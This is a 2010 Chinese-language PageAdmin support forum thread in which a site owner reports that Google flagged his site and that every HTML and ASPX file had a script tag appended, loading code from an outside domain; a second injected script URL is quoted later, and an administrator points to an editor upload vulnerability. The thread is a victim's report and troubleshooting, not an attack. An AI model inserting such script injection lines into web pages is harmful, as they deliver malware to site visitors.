网站被添加了代码 - 安装及使用交流-PageAdmin论坛

我的中心

产品使用及交流论坛 » 产品使用交流区 » 安装及使用交流 » 网站被添加了代码

返回列表

发新话题

回复该主题

查看: 4610\|回复: 8	网站被添加了代码 [复制链接]

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	1^# 字体大小: t T 发表于 2010-08-28 12:09 \|只看楼主我租用万网的M3空间,使用0324版本今天google发个邮件通知我,说: www.vcoole.com 的当前列表状态如何？此网站已列为可疑网站 - 访问此网站可能会损害您的计算机。在过去 90 天内，此网站的部分内容因包含可疑活动而被列出了 1 次。 Google 访问此网站时出现了什么情况？我们过去 90 天内对此网站上的 3 张网页进行了测试，发现有 2 张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是 2010-08-27，上次在此网站中发现可疑内容的日期是 2010-08-27。 Malicious software includes 1 exploit(s). Successful infection resulted in an average of 3 new process(es) on the target machine. 恶意软件托管在 1 个域上，其中包括 rollerderbybootcamp.com/。 This site was hosted on 2 network(s) including AS38356 (TIMENET), AS55462. 此网站是否以传播媒介的身份散发了更多恶意软件？在过去 90 天里，www.vcoole.com 并未以传播媒介的身份感染任何网站。此网站是否托管了恶意软件？没有，此网站在过去 90 天内未托管恶意软件。这是如何发生的？在某些情况下，第三方可以向合法网站添加恶意代码，我们会针对这种情况发出警告消息。下面的步骤：返回上一页。如果您是这个网址的拥有者，您可以使用 Google 管理员工具要求对您的网站进行审核。如需有关审核程序的详细信息，请访问 Google 的网站管理员帮助中心。我将目前网站上的代码和前些天的代码对比了一下,所有的HTML,ASPX等文件在最后面添加了一行: <script src= http://rollerderbybootcamp.com/cart/images/index.php ></script>
	分享转发 IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	2^# 字体大小: t T 发表于 2010-08-29 11:42 \|只看楼主昨天用以前的备份代码恢复了,今天还是又被添加了代码汗,0324有漏洞吧?
	IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

发送短消息 UID 12590 精华 0 1532299812 查看公共资料搜索主题搜索帖子 xcrane 飞雨鹤组别PageAdmin熟手生日帖子524 积分819 性别注册时间2010-07-18	3^# 字体大小: t T 发表于 2010-08-29 14:30 \|只看该用户我的网站也被黑，NND
	青良涂装设备 http://www.sh-qingliang.com

	TOP

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	4^# 字体大小: t T 发表于 2010-08-30 09:48 \|只看楼主我现在有一种怀疑今天另外的一个网站也被添加了: <script src=http://egyptfoods.com.eg/_vti_bin/newscat.php ></script> 所以我确定不是主机问题,而是程序有漏洞了
	IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

发送短消息 UID 27 精华 0 查看公共资料搜索主题搜索帖子 xiyou 组别管理员生日帖子16469 积分27332 性别注册时间2015-11-29	5^# 字体大小: t T 发表于 2010-08-30 10:00 \|只看该用户 0324 早期版本开始有一个编辑器上传漏洞见：http://www.pageadmin.net/articleinfo/detail_24_80_100.html 也可能是之前版本有木马没有清理干净


	TOP

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	6^# 字体大小: t T 发表于 2010-08-30 15:59 \|只看楼主 xiyou,请教一下,我之前网站使用的是那个学校的模板,我今天更新了全新的0324代码,再将upload,image,bin,database三个目录上传,但打开index页面出错,其它页面没问题请问是什么原因呢? 网站:http://vcoole2.30.bname.us/introduct/nav_3_1.aspx
	IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	7^# 字体大小: t T 发表于 2010-08-30 16:00 \|只看楼主 “/”应用程序中的服务器错误。 -------------------------------------------------------------------------------- 至少一个参数没有被指定值。说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。异常详细信息: System.Data.OleDb.OleDbException: 至少一个参数没有被指定值。源错误: 执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。堆栈跟踪: [OleDbException (0x80040e10): 至少一个参数没有被指定值。] System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object& executeResult) +267 System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeResult) +192 System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeResult) +48 System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) +106 System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) +111 System.Data.OleDb.OleDbCommand.ExecuteReader() +6 PageAdmin.template_pic.xba28efec9d7f3073() +3675 PageAdmin.template_pic.Page_Load(Object sender, EventArgs e) +111 System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +15 System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +33 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +47 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061 -------------------------------------------------------------------------------- 版本信息: Microsoft .NET Framework 版本:2.0.50727.1882; ASP.NET 版本:2.0.50727.1879
	IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

发送短消息 UID 27 精华 0 查看公共资料搜索主题搜索帖子 xiyou 组别管理员生日帖子16469 积分27332 性别注册时间2015-11-29	8^# 字体大小: t T 发表于 2010-08-30 17:08 \|只看该用户升级前需要看升级说明，不能直接覆盖的，新版本会增加一些新数据库字段，你要看你系统什么时候下载的，然后根据说明在后台运行升级SQL来更新数据库先，然后才能覆盖文件


	TOP

发送短消息 UID 5623 精华 0 myfreeke@hotmail.com 223883921 查看公共资料搜索主题搜索帖子 vcoole freeke 组别PageAdmin学员生日1980-1-1 帖子106 积分307 性别注册时间2009-11-25	9^# 字体大小: t T 发表于 2010-08-30 17:57 \|只看楼主回复 8# xiyou 的帖子汗,我不知道什么时候下载的了
	IT外包、运维外包、深圳IT外包http://www.grandtec.com.cn

	TOP

上一主题| 下一主题

发新话题

回复该主题